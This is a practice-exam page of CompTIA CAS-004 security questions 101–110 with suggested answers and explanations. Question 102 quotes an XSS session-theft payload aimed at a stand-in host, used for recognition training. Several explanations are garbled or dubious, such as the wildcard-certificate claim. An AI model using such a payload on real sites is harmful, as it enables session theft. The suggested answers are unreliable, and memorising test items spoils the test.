
CompTIA CAS-004 Practice Test - Questions Answers, Page 11


List of questions

Question 101

A company that uses AD is migrating services from LDAP to secure LDAP. During the pilot phase, services are not connecting properly to secure LDAP. Below is an excerpt of output from the troubleshooting session:

[Image: output from the troubleshooting session]

Which of the following BEST explains why secure LDAP is not working? (Select TWO.)

A. The clients may not trust idapt by default.
B. The secure LDAP service is not started, so no connections can be made.
C. Danvills.com is under a DDoS-inator attack and cannot respond to OCSP requests.
D. Secure LDAP should be running on UDP rather than TCP.
E. The company is using the wrong port. It should be using port 389 for secure LDAP.
F. Secure LDAP does not support wildcard certificates.
G. The clients may not trust Chicago by default.

Suggested answer: A, F
Explanation:

The clients may not trust idapt by default because it is a self-signed certificate authority that is not in the trusted root store of the clients. Secure LDAP does not support wildcard certificates because they do not match the fully qualified domain name of the server.

Reference: https://www.professormesser.com/security-plus/sy0-401/ldap-and-secure-ldap/, https://www.comptia.org/training/books/casp-cas-004-study-guide

asked 02/10/2024
Chan Park

Question 102

A threat analyst notices the following URL while going through the HTTP logs.

http://www.safebrowsing~~~/search.asp?q=<script>x=newimage;x.src=”http://baddomain~~~/session;

Which of the following attack types is the threat analyst seeing?

A. SQL injection
B. CSRF
C. Session hijacking
D. XSS

Suggested answer: D
Explanation:

XSS stands for cross-site scripting, a type of attack that injects malicious code into a web page, which is then executed by the victim's browser. The URL in the question contains a script tag that tries to execute JavaScript code from an external source, which is a sign of XSS.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://owasp.org/www-community/attacks/xss/

asked 02/10/2024
Jozsef Stelly

Question 103

The Chief Information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by these parties. Which of the following should be implemented to BEST manage the risk?

A. Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate design and operational controls into the contracts and a right-to-audit clause. Regularly assess the suppliers post-contract renewal with a dedicated risk management team.
B. Establish a team using members from first-line risk, the business unit, and vendor management to assess only the design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.
C. Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data. Review all design and operational controls based on best practice standards and report the findings back to upper management.
D. Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data. Assign key controls that are reviewed and managed based on the supplier's rating. Report findings to the units that rely on the suppliers and the various risk teams.

Suggested answer: D
Explanation:

A governance program that rates suppliers based on their access to data, the type of data, and how they access the data is the best way to manage the risk of third parties handling and securing customer data. It allows the company to assign key controls that are reviewed and managed based on the supplier's rating and to report findings to the relevant units and risk teams.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.isaca.org/resources/isaca-journal/issues/2018/volume-1/third-party-risk-management

asked 02/10/2024
Maryna Zarytska

Question 104

Company A is establishing a contractual relationship with Company B. The terms of the agreement are formalized in a document covering the payment terms, limitation of liability, and intellectual property rights. Which of the following documents will MOST likely contain these elements?

A. Company A-B SLA v2.docx
B. Company A OLA v1b.docx
C. Company A MSA v3.docx
D. Company A MOU v1.docx
E. Company A-B NDA v03.docx

Suggested answer: C
Explanation:

MSA stands for master service agreement, a document that covers the general terms and conditions of a contractual relationship between two parties. It usually includes payment terms, limitation of liability, intellectual property rights, dispute resolution, and other clauses that apply to all services provided by one party to the other.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.upcounsel.com/master-service-agreement

asked 02/10/2024
Mark Green

Question 105

A company requires a task to be carried out by more than one person concurrently. This is an example of:

A. separation of duties.
B. dual control.
C. least privilege.
D. job rotation.

Suggested answer: B
Explanation:

Dual control is a security principle that requires two or more authorized individuals to perform a task concurrently. This reduces the risk of fraud, error, or misuse of sensitive assets or information.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.isaca.org/resources/isaca-journal/issues/2018/volume-1/using-dual-control-to-mitigate-risk

asked 02/10/2024
john wick

Question 106

A health company has reached the physical and computing capacity of its datacenter, but the computing demand continues to increase. The infrastructure is fully virtualized and runs custom and commercial healthcare applications that process sensitive health and payment information. Which of the following should the company implement to ensure it can meet the computing demand while complying with healthcare standards for virtualization and cloud computing?

A. Hybrid IaaS solution in a single-tenancy cloud
B. PaaS solution in a multitenancy cloud
C. SaaS solution in a community cloud
D. Private SaaS solution in a single-tenancy cloud

Suggested answer: A
Explanation:

A hybrid IaaS solution in a single-tenancy cloud is the best option for the company to meet the computing demand while complying with healthcare standards for virtualization and cloud computing. A hybrid IaaS solution allows the company to use both on-premises and cloud-based resources to scale up its capacity and performance. A single-tenancy cloud ensures that the company's data and applications are isolated from other customers and have dedicated resources and security controls.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.hhs.gov/hipaa/for-professionals/special-topics/cloud-computing/index.html

asked 02/10/2024
thanh nguyen

Question 107

A developer implemented the following code snippet.

[Image: code snippet]

Which of the following vulnerabilities does the code snippet resolve?

A. SQL injection
B. Buffer overflow
C. Missing session limit
D. Information leakage

Suggested answer: A
Explanation:

SQL injection is a type of vulnerability that allows an attacker to execute malicious SQL commands on a database by inserting them into an input field. The code snippet resolves this vulnerability by using parameterized queries, which prevent the input from being interpreted as part of the SQL command.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://owasp.org/www-community/attacks/SQL_Injection

asked 02/10/2024
Vangelis Gouloutis

Question 108

A security analyst is investigating a series of suspicious emails reported by employees to the security team. The emails appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the messages by the security tools the company uses; instead, the emails only include the following in plain text.

[Image: plain-text email content]

Which of the following should the security analyst perform?

A. Contact the security department at the business partner and alert them to the email event.
B. Block the IP address for the business partner at the perimeter firewall.
C. Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
D. Configure the email gateway to automatically quarantine all messages originating from the business partner.

Suggested answer: A
Explanation:

The best option for the security analyst is to contact the security department at the business partner and alert them to the email event. The email appears to be a phishing attempt that tries to trick the employees into revealing their login credentials by impersonating a legitimate sender. The security department at the business partner should be notified so they can investigate the source and scope of the attack and take appropriate actions to protect their systems and users.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://us-cert.cisa.gov/ncas/tips/ST04-014

asked 02/10/2024
Abdul Majid Pasha

Question 109

A financial services company wants to migrate its email services from on-premises servers to a cloud-based email solution. The Chief Information Security Officer (CISO) must brief the board of directors on the potential security concerns related to this migration. The board is concerned about the following:

* Transactions being required by unauthorized individuals.

* Complete discretion regarding client names, account numbers, and investment information.

* Malicious attackers using email to distribute malware and ransomware.

* Exfiltration of sensitive company information.

The cloud-based email solution will provide anti-malware, reputation-based scanning, signature-based scanning, and sandboxing. Which of the following is the BEST option to resolve the board's concerns for this email migration?

A. Data loss prevention
B. Endpoint detection and response
C. SSL VPN
D. Application whitelisting

Suggested answer: A
Explanation:

Data loss prevention (DLP) is the best option to resolve the board's concerns for this email migration. DLP is a set of tools and policies that aim to prevent unauthorized access, disclosure, or exfiltration of sensitive data. DLP can monitor, filter, encrypt, or block email messages based on predefined rules and criteria, such as content, sender, recipient, and attachments. DLP can help protect transactions, customer data, and company information from being compromised by malicious actors or accidental leaks.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.csoonline.com/article/3245746/what-is-dlp-data-loss-prevention-and-how-does-it-work.html

asked 02/10/2024
Adilet Abdikhamit

Question 110

Which of the following BEST sets expectations between the security team and business units within an organization?

A. Risk assessment
B. Memorandum of understanding
C. Business impact analysis
D. Business partnership agreement
E. Service level agreement

Suggested answer: E
Explanation:

A service level agreement (SLA) is the best option to set expectations between the security team and business units within an organization. An SLA is a document that defines the scope, quality, roles, responsibilities, and metrics of a service provided by one party to another. An SLA can help align the security team's objectives and activities with the business units' needs and expectations, as well as establish accountability and communication channels.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://searchitchannel.techtarget.com/definition/service-level-agreement

asked 02/10/2024
Alberto Paniagua